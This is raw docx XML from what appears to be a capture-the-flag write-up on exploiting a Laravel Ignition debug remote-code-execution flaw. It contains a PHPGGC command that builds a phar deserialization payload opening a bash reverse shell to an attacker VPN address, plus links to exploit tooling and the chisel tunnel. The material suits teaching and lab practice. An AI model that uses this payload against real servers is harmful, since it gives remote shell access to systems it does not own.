          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ambionics/phpggc</w:t>
        </w:r>
      </w:hyperlink>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PHPGGC is a library of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads along with a tool to generate them from the command line or programmatically. When you encounter an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize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call in a site where you do not have access to the source code, or when creating an exploit, this tool allows you to generate payloads without manually chaining gadgets.</w:t>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Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.ambionics.io/blog/laravel-debug-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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56"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exploitation tools on our machine, we can execute the exploit.</w:t>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0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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first time we executed it, it failed. The second time it succeeded, and we obtained the output of the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Now we can obtain a reverse shell.</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 -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'"</w:t>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71"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execute the exploit.</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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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it, we receive the connection.</w:t>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70"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simply read the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6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61"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headerReference r:id="rId47" w:type="default"/>
      <w:headerReference r:id="rId48" w:type="first"/>
      <w:headerReference r:id="rId49" w:type="even"/>
      <w:footerReference r:id="rId50" w:type="default"/>
      <w:footerReference r:id="rId51" w:type="first"/>
      <w:footerReference r:id="rId5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1">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="17"/>
    <w:bookmarkEnd w:id="1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80" name="image21.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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72">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73">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7" name="image2.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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Vaccinate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mbionics.io/blog/laravel-debug-rce" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.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hackingclub.com/training/training-machines/28"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19.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flareapp.io/docs/ignition-for-laravel/introduction" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flareapp.io/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flareapp.io/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/phpggc" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ambionics/laravel-exploits" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Function_Injection" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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 Id="rId2"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4.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ec1tUniPacDiyzpTHFdMiBIgsg==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmZtZm9sdjhiaDRoajIMaC5qZTZhN25kM200Mg5oLnB0eWNjcTdnOGphODIOaC52dTV1dWtlcXNjZmYyDmguZ2Nlcm5mbHk4bGczMg5oLmh3aXk4eDJsc3FpazIOaC5mMGhxemxzaTdxcmEyDmguaDNicWRma3d1aWJqMg5oLnBtNGlzM2NlNTV5bTIOaC5nb3pieGY4MWQwbWIyDmgudGsxMGEydmFuaG4xMg5oLmU2ZXp5MjNqM2hteDIOaC5uaXR0aXBlNWhidnkyDmguMTc1ZjVjczk0ejBvOAByITFmbWlzQmhGckN5QzNKWExSOXlSaEJ1OW10eVZ0Z195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